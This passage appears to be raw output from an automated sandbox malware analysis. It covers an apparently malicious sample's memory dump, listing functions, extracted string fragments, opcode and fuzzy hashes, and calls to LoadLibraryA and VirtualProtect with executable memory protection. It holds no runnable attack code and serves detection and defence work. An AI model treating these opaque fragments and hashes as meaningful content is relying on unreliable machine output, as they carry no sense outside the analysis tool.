Instruction Fuzzy Hash: 5A21B4356042959FE721CF6CC844B6E7BE4AF45628F2841EDD841CBA51DF70F845CB80

Function 023411BF Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 023432E2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 02343374

VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 023411F7
VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 0234121A

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 31a2c6fb5a155253d75781cd9ceba9c7cc267d2f06376007566f6440306b8afe
Instruction ID: a49ad5ada9984dfbd336445447e41c46e58dc5c395b3340b789bf5a3192dc652
Opcode Fuzzy Hash: 31a2c6fb5a155253d75781cd9ceba9c7cc267d2f06376007566f6440306b8afe
Instruction Fuzzy Hash: 1DF081B61106087AE620AA64DC41FFF73ECDF49614F400458FF4AD6080EB61FA418AA5

Non-executed Functions

Function 023278FF Relevance: 40.3, Strings: 32, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 02327B21
e, xrefs: 02327B06
X, xrefs: 02327B33
:, xrefs: 02327A01
{, xrefs: 02327A25
t, xrefs: 02327A88
e, xrefs: 02327A64
Y, xrefs: 02327B2A
|, xrefs: 02327AD9
c, xrefs: 02327AEB
K, xrefs: 02327A1C
t, xrefs: 02327AFD
j, xrefs: 02327AB5
y, xrefs: 02327A6D
m, xrefs: 02327B18
{, xrefs: 02327AA3
d, xrefs: 02327AD0
O, xrefs: 02327B4E
s, xrefs: 02327ABE
r, xrefs: 02327A5B
}, xrefs: 02327AAC
`, xrefs: 02327A52
{, xrefs: 02327A2E
f, xrefs: 02327A76
|, xrefs: 02327A40
E, xrefs: 02327B3C
s, xrefs: 02327A37
t, xrefs: 02327AF4
}, xrefs: 02327AC7
), xrefs: 02327905
N, xrefs: 02327B45
z, xrefs: 02327A91

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
API String ID: 0-2770104185
Opcode ID: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
Instruction ID: 053d899feba2c0612d0951ffa4e1dffc173009e2f004bed7b27a6d894601b7d7
Opcode Fuzzy Hash: 7f6e799ca60fba2b1e70b9238865b2de8e17b7e5c269d78dd588de653e8ae45d
Instruction Fuzzy Hash: B2E1A935A2462986DB25CF24CC413DDB3B2FF85310F5491EDC4696B3A5EB388A85CB4B

Function 022FE6A1 Relevance: 29.0, Strings: 23, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RhTh, xrefs: 022FE925
vh}h, xrefs: 022FE875
Xh h, xrefs: 022FE967
hh(h, xrefs: 022FE8EE
ph8h, xrefs: 022FE88B
HhPh, xrefs: 022FE91A
uhjh, xrefs: 022FE8E3
Ehph, xrefs: 022FE992
<h7h, xrefs: 022FE972
ehdh, xrefs: 022FE904
^hYh, xrefs: 022FE93B
ChYh, xrefs: 022FE946
yhrh, xrefs: 022FE8CD
fhch, xrefs: 022FE8C2
uheh, xrefs: 022FE8B7
`h,h, xrefs: 022FE8F9
xhdh, xrefs: 022FE8A1
ohuh, xrefs: 022FE880
FhFh, xrefs: 022FE95C
Rhvh, xrefs: 022FE896
0h+h, xrefs: 022FE8AC
shoh, xrefs: 022FE8D8
Kh^h, xrefs: 022FE951

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
API String ID: 0-2769190428
Opcode ID: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
Instruction ID: 73c9a107291dec41203f412c4c51255eceede39150cc5dfbeebe846c4386b346
Opcode Fuzzy Hash: 62bd0668214c51b4c5d17cf1187cf7cd8d844dc3ff97adb52a48ee0f94597fea
Instruction Fuzzy Hash: 2E8111B191D3D18AD7318F68D98939BBBE1EFC2300F55496CC2C85B220E7760516CB57

Function 0230FDBC Relevance: 18.3, Strings: 14, Instructions: 821
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?g3q, xrefs: 02310186
2O#O, xrefs: 023104F1
<[&^, xrefs: 02310106
3?Uq, xrefs: 0231011E
%b*], xrefs: 023100E6
5a|u, xrefs: 02310126
^*a, xrefs: 023100FE
>, xrefs: 02310156
'O'O, xrefs: 023104E9
Y?q?, xrefs: 023101BD
7:n\, xrefs: 023102A3
A:v], xrefs: 023100F6
sy:K, xrefs: 0231013E
#J+Y, xrefs: 0231015E

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
API String ID: 0-3553224314
Opcode ID: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
Instruction ID: 9bef259040bbad7ade4cdd1e71e33a3ecc6ca17a2021a2612e1afc7a6d9ef068
Opcode Fuzzy Hash: 0e7f15785e9422a88d43a37637ed228b1f63b83bd63c417a99a314ab803aab10
Instruction Fuzzy Hash: 2A52477190C3518FC729DF24C89076FBBE1AF85314F088A6DE8D99B392E7358945CB92

Function 0231244C Relevance: 16.7, Strings: 13, Instructions: 419
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:3 3, xrefs: 0231250C
*, xrefs: 023128E7
93=3, xrefs: 0231252C
#3=3, xrefs: 02312524
k3l3, xrefs: 023124FC
i3_3, xrefs: 023124F4
83R3, xrefs: 02312504
'3!3, xrefs: 0231251C
d3f3, xrefs: 023124EC
O30, xrefs: 02312544
#3#3, xrefs: 02312514
83F3, xrefs: 02312534
J3L3, xrefs: 0231253C

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
API String ID: 0-1612148737
Opcode ID: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
Instruction ID: 85a0367be6e594bc30574b7c12716eb455307c67b197519321bfdf18fa40ea7a
Opcode Fuzzy Hash: 9399a7ee9c6e5426ff3ceaea5b5b42d51cd07c97ddf9252c8df36100a12064cf
Instruction Fuzzy Hash: 8FB1E0B15183608BC728DF28C85676BB7F1FFD1314F189A1CE8968B3A4E7748944CB96

Function 02327F95 Relevance: 12.8, Strings: 10, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A|, xrefs: 02328007
L|, xrefs: 02328022
Y|, xrefs: 02327FBF
<, xrefs: 02328165
>, xrefs: 0232816E
H|, xrefs: 02328046
3), xrefs: 023282C2
?|, xrefs: 023280A0
|, xrefs: 02327FB6
0, xrefs: 023282B2

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
API String ID: 0-3316653610
Opcode ID: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
Instruction ID: 818abb8ec1a5fd6f4a2afdb36773adacdb98e19d4ab45b3ae9e9613b1d5ea261
Opcode Fuzzy Hash: 0dc91d836e0d5c3997780718ccc6f68a7ea55a4edb7e82d95e45a445da5d2cfb
Instruction Fuzzy Hash: 6DC1E232E1427886DB24CF69CC103DDB3B2EF40314F1595E9C909AB3A5E7344E86CB9A

Function 023096A6 Relevance: 9.0, Strings: 7, Instructions: 237COMMON

Download Yara Rule

Strings

"f&f, xrefs: 023096E1
=f(f, xrefs: 023096F1
,f4f, xrefs: 02309701
{fGf, xrefs: 02309722
Pf6f, xrefs: 023096F9
)fvf, xrefs: 02309709
=f!f, xrefs: 023096E9

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: "f&f$)fvf$,f4f$=f!f$=f(f$Pf6f${fGf
API String ID: 0-1107927452
Opcode ID: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
Instruction ID: f10e3309d45e700b0d4e5787cc44329a819ca56a39f0382b28dc6af66e714906
Opcode Fuzzy Hash: 1608b7182de8cbe444d3093ca434a734da6d5c0a9eca3f72a53d91f17003a5b6
Instruction Fuzzy Hash: 8471E5728143218BC7248F19C4A17ABF7F1FF85B50F0A891DE8C96B3A1E7749950CB95

Function 0230E4F0 Relevance: 9.0, Strings: 7, Instructions: 233COMMON

Download Yara Rule

Strings

8!?!, xrefs: 0230E58A
(!T!, xrefs: 0230E59A
8!(!, xrefs: 0230E57A
pdvd, xrefs: 0230E6FF
2!0!, xrefs: 0230E572
{dd, xrefs: 0230E6EF
ndsd, xrefs: 0230E6D7

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: (!T!$2!0!$8!(!$8!?!$ndsd$pdvd${dd
API String ID: 0-1518220675
Opcode ID: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
Instruction ID: b2f4f04c67a5f3cd53724e883504f4c00dd9f37dd2c27f8ea76cd3e3eab847e3
Opcode Fuzzy Hash: 2f878382fdc0504f8a728bb41ff19acb4626bafb4b905e0c7bf6778849e2319d
Instruction Fuzzy Hash: 4D71CBB2A5C3149BC715CF16C88166FBBE2FFD5304F49AC2CE5C88B250D235DA098B96

Function 0231A2A5 Relevance: 8.9, Strings: 7, Instructions: 122COMMON

Download Yara Rule

Strings

cJwJ, xrefs: 0231A346
rJnJ, xrefs: 0231A356
bJSJ, xrefs: 0231A405
wJbJ, xrefs: 0231A33E
J, xrefs: 0231A366
,J^J, xrefs: 0231A34E
tJdJ, xrefs: 0231A35E

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
API String ID: 0-492521606
Opcode ID: 4d3acfe89bc8585b86a75a3c39782e98ea8896ee447a22d9099341d6b753cdf1
Instruction ID: 37ebbc64f83309958897b7c07427e02d90f6b7a608f54c9c8eee8c6adddb694d
Opcode Fuzzy Hash: 4d3acfe89bc8585b86a75a3c39782e98ea8896ee447a22d9099341d6b753cdf1
Instruction Fuzzy Hash: A741DFB1919302CBD328CF54C4506ABB3F2FFC0351F15992CE9854B394EB78A655CB4A

Function 022FF4B7 Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

d"P", xrefs: 022FF875
D, xrefs: 022FF7A1
6"", xrefs: 022FF8DD
p"F", xrefs: 022FF83D
"", xrefs: 022FF8BD
"", xrefs: 022FF88D

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: 6""$D$d"P"$p"F"$""$""
API String ID: 0-1382292853
Opcode ID: ef6966575e4db5163fe2337bff5729e0b92dd2d33053b519697345d8928989b0
Instruction ID: 2f25cf0739c61f799b28db3273cabd01a25e8a9af928760f742692ba2c555027
Opcode Fuzzy Hash: ef6966575e4db5163fe2337bff5729e0b92dd2d33053b519697345d8928989b0
Instruction Fuzzy Hash: 8DB1F3B04183829BE768CF80C69476BBBF1FF85748F104A8CE5945B294D3F68648DF86

Function 0231719C Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

c2o2, xrefs: 023173E7
o2x2, xrefs: 023173BF
u202, xrefs: 023173B7
}2q2, xrefs: 023173AF
M2x2, xrefs: 023173DF
m2?2, xrefs: 023173D7

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
API String ID: 0-1290146539
Opcode ID: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction ID: ab248f85fc22ffe0a8a82f2c44a4f350ee89e3d6ca7738132cabb0e902e99b5a
Opcode Fuzzy Hash: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction Fuzzy Hash: FB610BB19183509BC728DF19CD8066BB7F1FFC5314F08896DE8855B394E7B58A05CB8A

Function 023183BC Relevance: 7.6, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

>M5M, xrefs: 02318BB9
MM, xrefs: 02318B38
-M M, xrefs: 02318BF0
%M)M, xrefs: 02318BC4
)M-M, xrefs: 02318B56
4M:M, xrefs: 02318BDA

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
API String ID: 0-1618744259
Opcode ID: 6bb92850b2d7d3641eec0a61aca66db7b9ec77351d41e738220d4935adcea50a
Instruction ID: 2473201911d9e18642418a0a72ed3a62dd306bf8132c9f252fa068e61487c4b3
Opcode Fuzzy Hash: 6bb92850b2d7d3641eec0a61aca66db7b9ec77351d41e738220d4935adcea50a
Instruction Fuzzy Hash: 533179B061D7808AE7389F24D841BABBAB6FB82354F46991CE4C9AB214D7358045CF1B

Function 02300F55 Relevance: 7.1, Strings: 5, Instructions: 860COMMON

Download Yara Rule

Strings

", xrefs: 023012D7
L, xrefs: 023016C3
+, xrefs: 02301842
EN, xrefs: 023013AE
Vr, xrefs: 02300FB7

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: "$+$EN$L$Vr
API String ID: 0-3667360776
Opcode ID: 9a71aeee5feb5ea98c9d15c0ef6c878490df6ebf63bd4bb717a560cf6d761d55
Instruction ID: 6aa8fdaa4330bd37cd695b7d969df783402dbdaa7102417d708c96d1850b29b7
Opcode Fuzzy Hash: 9a71aeee5feb5ea98c9d15c0ef6c878490df6ebf63bd4bb717a560cf6d761d55
Instruction Fuzzy Hash: 6D72A1726187408BD368DF78C4953AEB7E6AF85320F054A2EE9E9873D0D7788940CB53

Function 02301C73 Relevance: 7.0, Strings: 5, Instructions: 700COMMON

Download Yara Rule

Strings

f@, xrefs: 02302410
<., xrefs: 023022BA
i, xrefs: 0230241A
$, xrefs: 023023B1
X@, xrefs: 02302342

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: $$<.$X@$f@$i
API String ID: 0-92190101
Opcode ID: 76057aca78ef6258cb3f0f36a2a9c21cc4cc31b390b94c749221e06c0b8c2956
Instruction ID: b6cb0f61daa0692e782b20da83d635ede3908e31bb57d52d375d0fd9a49bbcb7
Opcode Fuzzy Hash: 76057aca78ef6258cb3f0f36a2a9c21cc4cc31b390b94c749221e06c0b8c2956
Instruction Fuzzy Hash: 2A529272A187908BC764DF78C4943AEB7E6AF84320F058A2ED9E9C73D1D7748841CB52

Function 0232971C Relevance: 6.8, Strings: 5, Instructions: 574COMMON

Download Yara Rule

Strings

C, xrefs: 023297EB
,,Y,, xrefs: 02329913
[d, xrefs: 023297A8
\, xrefs: 023297F6
W;, xrefs: 02329763

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: ,,Y,$C$W;$[d$\
API String ID: 0-2867424240
Opcode ID: 9f5a3a55b9afe0a89d9fc505072badb18eaa323c1cf13941a043a56f956f5005
Instruction ID: 6ff7efe88d2152d726cb6213c5fb903f9abfcb1aac281ec814d8c87546e724a8
Opcode Fuzzy Hash: 9f5a3a55b9afe0a89d9fc505072badb18eaa323c1cf13941a043a56f956f5005
Instruction Fuzzy Hash: 4302CA76A083109FD710DF64C884B6BBBE5EFC5714F24882DF9959B2A0E774E809CB42

Function 022FB69B Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

%X:X, xrefs: 022FB7C8
IX6X, xrefs: 022FB7DC
)XPX, xrefs: 022FB7BE
&XSX, xrefs: 022FB7B4
7XvX, xrefs: 022FB7D2

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: %X:X$&XSX$)XPX$7XvX$IX6X
API String ID: 0-642955395
Opcode ID: 42efe6a36395c178b10bc893f22e1426d2528c6eb6f76131c1adee47900fcec9
Instruction ID: 7fa53a4d3e314facee322539f8986aa3d3a3ab460c9a3ee9fa1642382cc579cc
Opcode Fuzzy Hash: 42efe6a36395c178b10bc893f22e1426d2528c6eb6f76131c1adee47900fcec9
Instruction Fuzzy Hash: D7418B73E107168BE790CFA5DC847D6BB7AEB82B00F0581BC8518E7640EB748652CF40

Function 02312F9C Relevance: 5.6, Strings: 4, Instructions: 586COMMON

Download Yara Rule

Strings

H, xrefs: 0231328F
,, xrefs: 0231358C
!@, xrefs: 02312FCF
H, xrefs: 02313285

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$H$H
API String ID: 0-4170808191
Opcode ID: 07a41929d58c038910b4883344931460a371bacd5174635f6997d3fb7463155f
Instruction ID: bcedfe48cc176a87df028f82f6e7e08f0f953c9f02d951a5926c72f3efafb272
Opcode Fuzzy Hash: 07a41929d58c038910b4883344931460a371bacd5174635f6997d3fb7463155f
Instruction Fuzzy Hash: EF32BF7161C3408FD3289F28C4913AFBBE2AFC5324F19896DE5DA873A1D7798845CB46

Function 023030CC Relevance: 4.9, Strings: 2, Instructions: 2356COMMON

Download Yara Rule

Strings

`, xrefs: 02303FE8
&8, xrefs: 023033EF

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: &8$`
API String ID: 0-842996520
Opcode ID: 3ff6ec6a9b9cf5832afdf5d599e7f3729040dbc2b936a533fb27237fdf7d523b
Instruction ID: dda31bf84a0154693c47c738a2cf73bb270af9df0d3f37273aa6a8611d0efeb0
Opcode Fuzzy Hash: 3ff6ec6a9b9cf5832afdf5d599e7f3729040dbc2b936a533fb27237fdf7d523b
Instruction Fuzzy Hash: EE13E2B2D142248BCB14DF78C8913AEBBF1AF44310F0586ADD959AB391E7358E45CF92

Function 02317F4C Relevance: 4.1, Strings: 3, Instructions: 380COMMON

Download Yara Rule

Strings

X`X*, xrefs: 02318347
l'Y9, xrefs: 0231833F
{$[7, xrefs: 02318362

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: X`X*$l'Y9${$[7
API String ID: 0-1509796914
Opcode ID: 4d1a071dd5a51163a6e43cfc407dd2c3b5ea858498c259f9a98105892868a14e
Instruction ID: adbca4d345d32038de284ab2fa07cb11a2637acf76585e2a5ee628dca4ed31c8
Opcode Fuzzy Hash: 4d1a071dd5a51163a6e43cfc407dd2c3b5ea858498c259f9a98105892868a14e
Instruction Fuzzy Hash: 30B12B72A143149BEB28CF58C8417ABB3A2EF95304F09853CED859B351D335ED0AC799

Function 022FAF9C Relevance: 4.1, Strings: 3, Instructions: 366COMMON

Download Yara Rule

Strings

bC, xrefs: 022FB3CF
pid, xrefs: 022FB054
mX, xrefs: 022FB00F

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: bC$mX$pid
API String ID: 0-825546773
Opcode ID: 49f1ae9cf1187bed11a64702f0a534ae933f969ad53776653a448421e2cb6978
Instruction ID: 5f0a73d0d555e57bdcc6e4a62f14f106f4c8058bbcf449b228db639e5a9f358d
Opcode Fuzzy Hash: 49f1ae9cf1187bed11a64702f0a534ae933f969ad53776653a448421e2cb6978
Instruction Fuzzy Hash: 20C122B1A183118BD328CF64C851AAFFBE5FF84304F15592DE5AADB260E734D509CB86

Function 022FC2DC Relevance: 4.1, Strings: 3, Instructions: 349COMMON

Download Yara Rule

Strings

F>]>, xrefs: 022FC3AB
ok, xrefs: 022FC4EF
j>a>, xrefs: 022FC43B

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: F>]>$j>a>$ok
API String ID: 0-2883800044
Opcode ID: 4e92e947c669020acb45c569a1a1553fc077076f9e7ef8d8f2e7ef84482c917a
Instruction ID: 4ef13b4dc8f4e00eb06dc1f8bbd4ee3bb8c9cbc28526875171049e9d53771f39
Opcode Fuzzy Hash: 4e92e947c669020acb45c569a1a1553fc077076f9e7ef8d8f2e7ef84482c917a
Instruction Fuzzy Hash: E8B1F0B252C3168BC328CF54845016BFBE2EFD1704F15582EEAD5AB344D3799909CB9A

Function 022F9CEC Relevance: 4.0, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

${*{, xrefs: 022F9DE7
., xrefs: 022F9D45
P"D, xrefs: 022F9F72

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: ${*{$.$P"D
API String ID: 0-640708526
Opcode ID: b7637f650ca3e41c53f0ed85980e61778829ecfea06bfdabb1f92a68bb9f1c63
Instruction ID: 195df66afaa2a1fc209229ae70232545ad5ed83601dfbf00581edb81fa92455c
Opcode Fuzzy Hash: b7637f650ca3e41c53f0ed85980e61778829ecfea06bfdabb1f92a68bb9f1c63
Instruction Fuzzy Hash: 46813D32F143124BC7509E68C8C035AF7E6ABC0714F168B79E9955B3ADE774D8858BC1

Function 022F660C Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

8, xrefs: 022F6F42
0, xrefs: 022F6F4A

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2ddd98d90996f6ff769892f79818dbd2de7a54bca0126600855e5b3538ddbadc
Instruction ID: 81ff904479e6c9713194f104640857efc3392315d8c4e611a545c59f4a5f4508
Opcode Fuzzy Hash: 2ddd98d90996f6ff769892f79818dbd2de7a54bca0126600855e5b3538ddbadc
Instruction Fuzzy Hash: 6F7278716183419FD764CF58C880BABBBE5EF84314F08892DFA988B395D375D948CB92

Function 022FAB2C Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

@, xrefs: 022FAC92
^~dx, xrefs: 022FAC2A

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: @$^~dx
API String ID: 0-212991012
Opcode ID: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction ID: c862b7c7c54e5c1510237aef9c907ed17f835700ea6c555ed65eb6aac8211bd5
Opcode Fuzzy Hash: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction Fuzzy Hash: 37C1147261C3928AD325CF79C4803ABFBE1AF86304F0858ADE5D9DB286D739C505C766

Function 022F5CCC Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 022F60BD
), xrefs: 022F5D47

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: cc6d70053be118b360131ef44f2de66a3c217fc8f7de176e2503fc4567789736
Instruction ID: b50dd06536b491301c8619feaf1ccb37e8b5cf4cc93b4c822c01739051722df4
Opcode Fuzzy Hash: cc6d70053be118b360131ef44f2de66a3c217fc8f7de176e2503fc4567789736
Instruction Fuzzy Hash: 84D1FEB19183459FE760CF58C844B5BFBE5EB84304F04492DFA989B385E7B5D948CB82

Function 0230749E Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

gfff, xrefs: 02307653
7, xrefs: 023075F6

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 325078486bc0896a058d97b82627942891593aaf5078991bec0c705fe1fd99c6
Instruction ID: 9a995c07341ef8dd81473d7decc502d3e896a3af195903af89e74510139fbec0
Opcode Fuzzy Hash: 325078486bc0896a058d97b82627942891593aaf5078991bec0c705fe1fd99c6
Instruction Fuzzy Hash: 4BA13973F146214BD728CF29CC917ABB6D2BBC8314F0AC67DD489DB395DA7898028790

Function 0230B35C Relevance: 2.8, Strings: 1, Instructions: 1513COMMON

Download Yara Rule

Strings

Fn@n, xrefs: 0230B791

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID: Fn@n
API String ID: 0-2265005453
Opcode ID: 14b1972c4976d09e00f9c53082324f23326010c554cb9f92a77b06668dee1ef5
